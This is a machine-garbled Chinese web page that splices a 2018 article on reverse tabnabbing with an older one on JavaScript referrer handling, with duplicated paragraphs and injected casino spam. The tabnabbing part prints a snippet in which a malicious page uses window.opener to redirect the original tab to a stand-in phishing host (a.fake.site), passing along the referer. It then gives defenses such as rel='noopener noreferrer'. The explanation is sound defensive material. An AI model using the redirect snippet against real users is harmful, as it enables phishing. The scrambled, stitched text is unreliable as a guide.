javascript操作referer详细解析,_blank属性的妙用

危险的 target=”_blank” 与 “opener”

2018/09/05 · JavaScript
· target

原稿出处:
创宇前端   

澳门葡京 1

在网页中选用链接时,假如想要让浏览器自动在新的标签页打开指定的地点,平时的做法就是在
a 标签上添加 target等于"_blank" 属性。

不过,就是那些特性,为钓鱼攻击者带来了可乘之机。

大家都清楚 html 超链接标签 href 属性 target=”_blank”
的效益是使打开的链接以新开的窗口方式出现。不过除了直接写在 href
标签里面,你还了解有任何更抢眼的给链接加 target=”_blank”
的法门啊?上面小编将要和我们分享的是何许巧妙的行使 href target=”_blank”
这些标签。

Referrer的严重性 HTTP请求中有一个referer的报文头,用来指明当前流量的来源于参考页。例如在www.sina.com.cn/sports/上点击一个链接到达cctv.com首页,那么就referrer就是www.sina.com.cn/sports/了。在Javascript中,大家可以通过document.referrer来获取同样的音讯。通过这么些音讯,大家就足以知道访客是从什么渠道来到当前页面的。那对于Web
Analytics来说,是那一个主要的,这可以告诉大家差距渠道带来的流量的遍布情形,还有用户搜索的严重性词等,都是由此分析那一个referrer音讯来取得的。

Referrer的首要 HTTP请求中有一个referer的报文头,用来指明当前流量的来源于参考页。例如在www.sina.com.cn/sports/上点击一个链接到达cctv.com首页,那么就referrer就是www.sina.com.cn/sports/了。在Javascript中,大家可以经过document.referrer来获取同样的音讯。通过那么些新闻,大家就可以了解访客是从什么渠道来到当前页面的。那对于Web
Analytics来说,是不行紧要的,那可以告知大家不一样渠道带来的流量的分布意况,还有用户搜索的要紧词等,都是由此分析那个referrer音信来取得的。

起源

先是来看看 target=”_blank” 的用处:

而是,出于各样各类的缘故,有时候Javascript中读到的referrer却是空字符串。上面统计一下怎么境况下会丢失referrer。

然则,出于各个各个的因由,有时候Javascript中读到的referrer却是空字符串。上边总计一下什么样景况下会丢失referrer。

parentopener

在说 opener 从前,可以先聊聊 <iframe> 中的 parent

大家驾驭,在 <iframe> 中提供了一个用于父子页面交互的对象,叫做 window.parent,大家得以经过 window.parent 对象来从框架中的页面访问父级页面的 window

opener 与 parent 一样,只然而是用于 <a target="_blank"> 在新标签页打开的页面的。通过 <a target="_blank"> 打开的页面,可以一向利用 window.opener 来访问来源页面的 window 对象。

<a href=””
target=”_blank”>php+js 完毕瀑布流效果</a>
<form action=””
target=”_blank”>10个不常见却至极实用的PHP函数<input type=”submit”
value=”提交按钮”></form>

修改Location对象开展页面导航 Location对象是一个用以页面导航的非常实用的对象。因为她允许你只变更Url的内部一些。例如从cn域名切换来com域名,其余部分不变:

修改Location对象开展页面导航 Location对象是一个用于页面导航的不得了实用的对象。因为她允许你只变更Url的其中一些。例如从cn域名切换到com域名,其他部分不变:

同域与跨域

浏览器提供了整机的跨域敬重,在域名相同时,parent 对象和 opener
对象实际就直接是上一流的 window 对象;而当域名不相同时,parent
opener 则是通过包装的一个 global 对象。这个 global
对象仅提供充足有限的性质访问,并且在那仅有的多少个特性中,大多数也都是分歧意访问的(访问会直接抛出
DOMException)。

澳门葡京 2

在 <iframe> 中,提供了一个 sandbox 属性用于控制框架中的页面的权杖,由此固然是同域,也能够决定 <iframe> 的安全性。

 

下面的代码中,倘使不加 target=”_blank”
那个特性,默许均为本页直接打开,即:target=”_self”。

复制代码 代码如下:

复制代码 代码如下:

利用

万一,你的网站上有一个链接,使用了
target="_blank",那么只要用户点击那么些链接并进入一个新的标签,新标签中的页面倘使存在恶意代码,就足以将您的网站直接导航到一个仿真网站。此时,若是用户回到你的标签页,看到的就是被替换过的页面了。

下边说一下怎么会突然想到那些标签的呢!作者网站在当场规划时,对于链接这一块,没有做太多的想法,所有链接元素打开的措施都是_self。现在才意识存在很多题材,本站自己的内链就不说怎么了,不过公布在小说内容中的链接,多半是指向别人网站的连年,而那些链接也都是直接通过_self格局打开的,那几个标题就来了,用户体验度不佳不说,对自己网站的流量,权重都是个挺大的损失。那怎么化解那个标题呢?我索要的是在网页页面局地达成href 的 target=”_blank” 属性,最终想出了三种办法:

window.location.hostname = “example.com”;

window.location.hostname = “example.com”;

详细步骤

  1. 在你的网站 https://example.com 上设有一个链接:
&lt;a href="https://an.evil.site"
target="\_blank"&gt;进入一个“邪恶”的网站&lt;/a&gt;

<table>
<colgroup>
<col style="width: 50%" />
<col style="width: 50%" />
</colgroup>
<tbody>
<tr class="odd">
<td><div class="crayon-nums-content" style="font-size: 13px !important; line-height: 15px !important;">
<div class="crayon-num" data-line="crayon-5b8f6c4939c60150781393-1">
1
</div>
</div></td>
<td><div class="crayon-pre" style="font-size: 13px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;">
<div id="crayon-5b8f6c4939c60150781393-1" class="crayon-line">
&lt;a href=&quot;https://an.evil.site&quot; target=&quot;_blank&quot;&gt;进入一个“邪恶”的网站&lt;/a&gt;
</div>
</div></td>
</tr>
</tbody>
</table>
  1. 用户点击了那一个链接,在新的标签页打开了这一个网站。这一个网站可以经过
    HTTP Header 中的 Referer
    属性来判断用户的起点。并且,这么些网站上含蓄着类似于那般的 JavaScript
    代码:
const url = encodeURIComponent('{{header.referer}}');
window.opener.location.replace('https://a.fake.site/?' + url);

<table>
<colgroup>
<col style="width: 50%" />
<col style="width: 50%" />
</colgroup>
<tbody>
<tr class="odd">
<td><div class="crayon-nums-content" style="font-size: 13px !important; line-height: 15px !important;">
<div class="crayon-num" data-line="crayon-5b8f6c4939c6a538489517-1">
1
</div>
<div class="crayon-num crayon-striped-num" data-line="crayon-5b8f6c4939c6a538489517-2">
2
</div>
<div class="crayon-num" data-line="crayon-5b8f6c4939c6a538489517-3">
3
</div>
</div></td>
<td><div class="crayon-pre" style="font-size: 13px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;">
<div id="crayon-5b8f6c4939c6a538489517-1" class="crayon-line">
const url = encodeURIComponent('{{header.referer}}');
</div>
<div id="crayon-5b8f6c4939c6a538489517-2" class="crayon-line crayon-striped-line">
window.opener.location.replace('https://a.fake.site/?' + url);
</div>
<div id="crayon-5b8f6c4939c6a538489517-3" class="crayon-line">
 
</div>
</div></td>
</tr>
</tbody>
</table>
  1. 此时,用户在此起彼伏浏览这么些新的标签页,而原来的网站所在的价签页此时早就被导航到了
    https://a.fake.site/?https%3A%2F%2Fexample.com%2F
  2. 恶意网站 https://a.fake.site 按照 Query String
    来充数一个足以欺骗用户的页面,并展现出来(时期还可以够做三遍跳转,使得浏览器的地址栏更兼具迷惑性)。
  3. 用户关闭 https://an.evil.site
    的标签页,回到原先的网站………………已经回不去了。

地点的口诛笔伐步骤是在跨域的状态下的,在跨域情状下,opener 对象和
parent
一样,是饱受限制的,仅提供至极有限的习性访问,并且在这仅局地多少个属性中,大多数也都是不允许访问的(访问会间接抛出
DOMException)。

但是与 parent 不一致的是,在跨域的境况下,opener 依旧可以调用
location.replace 方法
parent 则不得以。

假定是在同域的情景下(比如一个网站上的某一个页面被植入了恶意代码),则情况要比地点严重得多。

(1)给这么些链接一个个手动去丰硕target=”_blank”,但那些艺术太笨了,太费时费劲。

不过,通过改动Location举行页面导航的法门,会促成在IE下丢失Referrer。

而是,通过修改Location进行页面导航的艺术,会招致在IE下丢失Referrer。

防御

``<iframe> 中有 sandbox 属性,而链接,则可以使用下边的方法:

(2)在页面 head 标签内加上 <base target=”_blank”>
那个标签,就一劳永逸了。那个标签可以使得页面上的具备连接都以新开窗口的样式打开。不过觉得那几个用户体验度很不好,用户才浏览了多少个网页就打开的全是自我的网站了,那会让人很不爽,至少我是那般觉得的。而且那一个在严苛的W3C标准中是不僧不俗的,至于为什么?原因很人性化,是因为国外人认为,不通过用户同意,就随便打开新窗口,是不礼貌的,不重视用户的选项。

IE5.5+ 下重返空字符串

IE5.5+ 下再次回到空字符串

1. Referrer Policy 和 noreferrer

地方的攻击步骤中,用到了 HTTP Header 中的 Referer 属性,实际上可以在
HTTP 的响应头中扩充 Referrer Policy 头来有限支撑来源隐衷安全。

Referrer Policy 须要修改后端代码来贯彻,而在前者,也足以使用 <a> 标签的 rel 属性来指定 rel="noreferrer" 来保障来源隐衷安全。

<a href=”” target=”_blank”
rel=”noreferrer”>进入一个“邪恶”的网站</a>

1
<a href="https://an.evil.site" target="_blank" rel="noreferrer">进入一个“邪恶”的网站</a>

可是要留心的是:即使限制了 referer
的传递,仍旧不可以阻止原标签被恶心跳转。

javascript操作referer详细解析,_blank属性的妙用。那那么些时候该如何是好吧?

Chrome3.0+,Firefox3.5,Opera9.6,Safari3.2.2均正常再次回到来源网页

Chrome3.0+,Firefox3.5,Opera9.6,Safari3.2.2均正常再次回到来源网页

2. noopener

为了安全,现代浏览器都协理在 <a> 标签的 rel 属性中指定 rel="noopener",这样,在打开的新标签页中,将不能再使用 opener 对象了,它为设置为了 null

<a href=”” target=”_blank”
rel=”noopener”>进入一个“邪恶”的网站</a>

1
<a href="https://an.evil.site" target="_blank" rel="noopener">进入一个“邪恶”的网站</a>

摸索了汪洋的资料得出 href 标签在 HTML 4.0
扩展了一个新属性:rel,这几个特性用来声明链接和带有此链接页面的关联,以及链接打开的目的。rel 有不少的属性值,比如next、previous,、chapter、section
等等。这里大家可以运用 rel=”external” 属性。那么原来如此写的代码:

window.open方式打开新窗口 示例:

window.open形式打开新窗口 示例:

3. JavaScript

noopener 属性看似是涸泽而渔了拥有标题,可是…浏览器的包容性难题…

澳门葡京 3

可以见到,现在超过一半浏览器都曾经格外了 rel="noopener"
属性了。然而,为了爱护稍旧的“近代”浏览器或是很旧的“北周”浏览器仍旧是“远古”浏览器,唯有
noopener 属性依然远远不够的。

那时,就只能请出上边这段原生 JavaScript 来援救了。

“use strict”; function openUrl(url) { var newTab = window.open();
newTab.opener = null; newTab.location = url; }

1
2
3
4
5
6
"use strict";
function openUrl(url) {
  var newTab = window.open();
  newTab.opener = null;
  newTab.location = url;
}

<a href=””
target=”_blank”>右下角弹出广告
js,漂浮效果(包容多浏览器)</a>

复制代码 代码如下:

复制代码 代码如下:

推荐

先是,在网站中的链接上,即使运用了 target="_blank",就要带上
rel="noopener",并且提出带上 rel="noreferrer"。类似于那样:

<a href=”” target=”_blank” rel=”noopener
noreferrer”>进入一个“邪恶”的网站</a>

1
<a href="https://an.evil.site" target="_blank" rel="noopener noreferrer">进入一个“邪恶”的网站</a>

理所当然,在跳转到第三方网站的时候,为了 SEO 权重,还提议带上
rel="nofollow",所以最终类似于如此:

<a href=”” target=”_blank” rel=”noopener
noreferrer nofollow”>进入一个“邪恶”的网站</a>

1
<a href="https://an.evil.site" target="_blank" rel="noopener noreferrer nofollow">进入一个“邪恶”的网站</a>

明日要写成那样:

<a href=”#”
onclick=”window.open(‘;

<a href=”#”
onclick=”window.open(‘;

性能

最终,再来说说品质难题。

比方网站使用了 <a target="_blank">,那么新开拓的标签页的属性将会影响到近日页面。此时一旦新开拓的页面中履行了一个老大巨大的
JavaScript
脚本,那么原始标签页也会遭到震慑,会并发卡顿的场景(当然未必卡死)。

而只要在链接中投入了
noopener,则此时八个标签页将会互不烦扰,使得原页面的属性不会遇到新页面的熏陶。

1 赞 收藏
评论

澳门葡京 4

<a href=””
rel=”external”>右下角弹出广告 js,漂浮效果(包容多浏览器)</a>

点击此链接会在新窗口打开谷歌网站,大家在地方栏中输入以下js代码就足以见见发送的referrer了。

点击此链接会在新窗口打开谷歌(Google)网站,大家在地点栏中输入以下js代码就可以看来发送的referrer了。

那是符合strict标准的措施。但是此地还非得同盟一个javascript才使得,相关的代码JS如下:

复制代码 代码如下:

复制代码 代码如下:

function externallinks(){
 if(!document.getElementsByTagName){
  return;
 }
 var anchors=document.getElementsByTagName("a");
 for(var i=0;i<anchors.length;i++){
  var anchor=anchors[i];
  if(anchor.getAttribute("href")&&anchor.getAttribute("rel")=="external"){
   anchor.target="_blank";
  }
 }
}
window.onload=externallinks;

javascript:alert(document.referrer)

javascript:alert(document.referrer)

你能够将以上代码保存成一个.js文件(比如external.js),然后经过外部联接方法调用:

测试结果:

测试结果:

<script type=”text/javascript”
src=”;

IE5.5+ 下回到空字符串

IE5.5+ 下重回空字符串

如此就解决了在网页页面局地达成 href 的 target=”_blank” 属性的难点了。

Chrome3.0+,Firefox3.5,Opera9.6,Safari3.2.2均正常再次来到来源网页

Chrome3.0+,Firefox3.5,Opera9.6,Safari3.2.2均正常再次来到来源网页

你可能感兴趣的小说

  • PHP中return 和 exit 、break和contiue 不一致与用法
  • JS怎么着操作css中float属性写法
  • Canonical标签及其效用[网站SEO]
  • MySQL replace函数替换字符串语句的用法
  • iframe属性详细表达
  • 什么设置DIV层突显在flash对象之上,兼容ie和firefox等浏览器
  • textarea提交内容换行不起效用的化解办法
  • php get_headers函数的效用及用法

html 超链接标签 href 属性
target=”_blank”
的效用是使打开的链接以新开的窗口格局出现。不过除此之外直接写在 href
标签里面,你还知…

借使是同个域名下通过此方法跳转的,那么我们可以经过访问windoww.opener对象去得到丢失的referrer新闻。代码如下:

一经是同个域名下通过此措施跳转的,那么我们可以透过走访windoww.opener对象去获取丢失的referrer消息。代码如下:

复制代码 代码如下:

复制代码 代码如下:

<script type=”text/javascript”>
    var referrer = document.referrer;
    if (!referrer) {
        try {
            if (window.opener) {
                // IE下一旦跨域则抛出权力十分
                // Safari和Chrome下window.opener.location没有此外性质
                referrer = window.opener.location.href;
            }
        } 
        catch (e) {}
    }
</script>

<script type=”text/javascript”>
    var referrer = document.referrer;
    if (!referrer) {
        try {
            if (window.opener) {
                // IE下一旦跨域则抛出权力很是
                // Safari和Chrome下window.opener.location没有其他性质
                referrer = window.opener.location.href;
            }
        } 
        catch (e) {}
    }
</script>

跨域的话则没辙了~

跨域的话则没辙了~

鼠标拖拽打开新窗口 鼠标拖拽是当今十二分流行的用户习惯,很多浏览器都置于或者可以透过插件的格局来支撑鼠标拖拽式浏览。不过经过那种格局打开的页面,基本全都丢失referrer。并且,那种情景下,也无所适从利用window.opener的办法去获得丢失的referrer了。

鼠标拖拽打开新窗口 鼠标拖拽是现行十二分流行的用户习惯,很多浏览器都置于或者可以由此插件的法子来支撑鼠标拖拽式浏览。不过透过那种措施打开的页面,基本全都丢失referrer。并且,那种景况下,也无力回天运用window.opener的主意去赢得丢失的referrer了。

已测试:

已测试:

Maxthon2.5.2,Firefox的FireGesture插件,Chrome3.0+,Opera9.6,Safari3.2。

Maxthon2.5.2,Firefox的FireGesture插件,Chrome3.0+,Opera9.6,Safari3.2。

点击Flash内部链接 点击Flash上到达其余一个网站的时候,Referrer的图景就相比较散乱了。

点击Flash内部链接 点击Flash上到达此外一个网站的时候,Referrer的情状就相比较散乱了。

IE下,通过客户端Javascript的document.referrer读取到的值是空的,可是一旦您使用流量监控软件看一下来说,你会发现,实际上HTTP请求中的Referer报文头却是有值的,那或者是IE落成的Bug。同时,那么些值指向的是Flash文件的地方,而不是来源于网页的地址。

IE下,通过客户端Javascript的document.referrer读取到的值是空的,不过假如你利用流量监控软件看一下来说,你会意识,实际上HTTP请求中的Referer报文头却是有值的,那可能是IE完毕的Bug。同时,那一个值指向的是Flash文件的地址,而不是根源网页的地方。

Chrome4.0下点击Flash到达新窗口之后,Referrer也是指向的Flash文件的地址,而不是源网页的地点。

Chrome4.0下点击Flash到达新窗口之后,Referrer也是指向的Flash文件的地方,而不是源网页的地方。

Chrome3.0和Safari3.2是相同的,都是会丢失Referrer新闻。

Chrome3.0和Safari3.2是同一的,都是会丢失Referrer音信。

Opera则和Firefox一样,Referrer的值都是源于网页的地方。

Opera则和Firefox一样,Referrer的值都是根源网页的地点。

HTTPS跳转到HTTP 从HTTPS的网站跳转到HTTP的网站时,浏览器是不会发送referrer的。那一个各大浏览器的作为是同样的。

HTTPS跳转到HTTP 从HTTPS的网站跳转到HTTP的网站时,浏览器是不会发送referrer的。那一个各大浏览器的行为是同等的。

诸如,大家在HTTPS下行使谷歌(Google)Reader或是Gmail的时候,点击某个链接去到别的一个网站,那么从技术上来说,那样的造访和用户直接键入网址访问是尚未什么分其他。

譬如说,大家在HTTPS下利用GoogleReader或是Gmail的时候,点击某个链接去到其它一个网站,那么从技术上来说,那样的访问和用户直接键入网址访问是从未有过什么样分其他。

Referrer丢失对于广告流量监控的影响 Referrer倘使丢失,Web
Analytics就会放弃很要紧的一有些音信了,越发对于广告流量来说,就不可能知道实际来源了。近来国内广大用了GoogleAdsense广告的网站,都拔取了window.open的法子来开辟广告链接,由此IE下会丢失Referrer,而我辈领略,IE是时下市场份额最大的浏览器,因而其影响是很大的。很多流量总计工具会为此将那部分流量归入“直接流量”,和用户直接键入网址等价了。

Referrer丢失对于广告流量监控的熏陶 Referrer假诺丢失,Web
Analytics就会放任很重大的一有的音讯了,尤其对于广告流量来说,就不可以知晓实际来源了。方今境内广大用了谷歌Adsense广告的网站,都使用了window.open的格局来打开广告链接,由此IE下会丢失Referrer,而大家知晓,IE是时下市场份额最大的浏览器,由此其震慑是很大的。很多流量计算工具会为此将这部分流量归入“直接流量”,和用户从来键入网址等价了。

对于这么的状态,需求让广告投放者在排放广告的时候,给着陆页面的Url加上一定的跟踪参数。

对此那样的气象,须求让广告投放者在投放广告的时候,给着陆页面的Url加上一定的跟踪参数。

譬如,某个Flash广告,点击之后到达的网址是

比如说,某个Flash广告,点击之后到达的网址是

在排放谷歌(Google)Adwords的时候,后台系统有一个“自动标记”的选项,当启用此选项的时候,谷歌在转变所有广告的着陆页面Url的时候,就会自行抬高一个gclid的参数,那个参数可以将谷歌Analytics后台和Adwords广告后台的数目举办结合。这样就可以知道广告流量对应于哪个广告铺天盖地,哪个广告来源和广告关键词等新闻了。和上边提到的思绪其实是类似的。只但是谷歌(Google)自动帮你做了Url的修改了罢了。

在投放GoogleAdwords的时候,后台系统有一个“自动标记”的选项,当启用此选项的时候,谷歌在转变所有广告的着陆页面Url的时候,就会自行抬高一个gclid的参数,那几个参数可以将谷歌Analytics后台和Adwords广告后台的数据举行整合。那样就足以精晓广告流量对应于哪个广告比比皆是,哪个广告来源和广告关键词等新闻了。和地点提到的笔触其实是相仿的。只但是谷歌自动帮您做了Url的改动了罢了。

IE下referer为空的解决办法 在IE下选取window.location.href格局跳转的话,referer值为空。而在标签里面的跳转的话
referer就不会空。所以,通过以下代码就可以化解这些IE难点

IE下referer为空的解决办法 在IE下使用
window.location.href方式跳转的话,referer值为空。而在标签里面的跳转的话
referer就不会空。所以,通过以下代码就足以解决那几个IE难题

复制代码 代码如下:

复制代码 代码如下:

function gotoUrl(url){
     if(window.VBArray){
         var gotoLink = document.createElement(‘a’);
         gotoLink .href = url;
         document.body.appendChild(gotoLink);
         gotoLink .click();
     }else{
       window.location.href = url;
     }
 }

function gotoUrl(url){
     if(window.VBArray){
         var gotoLink = document.createElement(‘a’);
         gotoLink .href = url;
         document.body.appendChild(gotoLink);
         gotoLink .click();
     }else{
       window.location.href = url;
     }
 }

不准浏览器在走访链接时绝不带上referer 俺们在从一个网站点击链接进去另一个页面时,浏览器会在header里加上Referer值,来标识本次访问的源点页面。但是那种标识有可能会走漏用户的心事,有时候自己不想让其余人知道自家是从哪儿点击进入的,能照旧不能有一手可以让浏览器不要发送Referer呢?

取缔浏览器在造访链接时不用带上referer 大家在从一个网站点击链接进去另一个页面时,浏览器会在header里加上Referer值,来标识本次访问的源点页面。不过那种标识有可能会败露用户的苦衷,有时候自己不想让其余人知道自己是从哪个地方点击进入的,能或不能有手腕可以让浏览器不要发送Referer呢?

•使用激增的html5的缓解方案,使用rel=”noreferrer”,申明连接的特性为noreferrer,如今只有chrome4+援助.
•使用当中页面,但事实上依旧发送referrer的,比如动用谷歌的总是转向,noreferrer.js.
•使用javascript研讨链接中转,参见上边的表达.

•使用激增的html5的缓解方案,使用rel=”noreferrer”,声明连接的性质为noreferrer,最近唯有chrome4+襄助.
•使用当中页面,但实际依旧发送referrer的,比如动用谷歌(Google)的连日转向,noreferrer.js.
•使用javascript合计链接中转,参见上边的表达.

新开一个窗口,相当于target=”_blank”:

新开一个窗口,相当于target=”_blank”:

复制代码 代码如下:

复制代码 代码如下:

function open_window(link){ 
    var arg =
‘\u003cscript\u003elocation.replace(“‘+link+'”)\u003c/script\u003e’;
    window.open(‘javascript:window.name;’, arg);
}
</CODE>

function open_window(link){ 
    var arg =
‘\u003cscript\u003elocation.replace(“‘+link+'”)\u003c/script\u003e’;
    window.open(‘javascript:window.name;’, arg);
}
</CODE>

倒车到一个连连,相当于target=”_self”:

转折到一个总是,相当于target=”_self”:

复制代码 代码如下:

复制代码 代码如下:

function redirect(link){ 
    var arg
=’\u003cscript\澳门葡京 ,u003etop.location.replace(“‘+link+'”)\u003c/script\u003e’;
    var iframe = document.createElement(‘iframe’);
    iframe.src=’javascript:window.name;’;
    iframe.name=arg;
    document.body.appendChild(iframe);
}
</CODE>

function redirect(link){ 
    var arg
=’\u003cscript\u003etop.location.replace(“‘+link+'”)\u003c/script\u003e’;
    var iframe = document.createElement(‘iframe’);
    iframe.src=’javascript:window.name;’;
    iframe.name=arg;
    document.body.appendChild(iframe);
}
</CODE>

HTTP请求中有一个referer的报文头,用来指明当前流量的来自参考页。例如在www.sina.com.cn/sports/上点击一个链接到达cctv.com首页…

您可能感兴趣的篇章:

  • 用PHP伪造referer突破网盘禁止外连的代码
  • VBS伪造HTTP-REFERER的兑现格局
  • 部分网站允许空白referer的防盗链图片的js破解代码
  • 动用php伪造referer的办法
    利用referer幸免图片盗链
  • 完善协作各大浏览器获取HTTP_REFERER方法总计
  • 使用JavaScript和C#中获得referer

相关文章

发表评论

电子邮件地址不会被公开。 必填项已用*标注

*
*
Website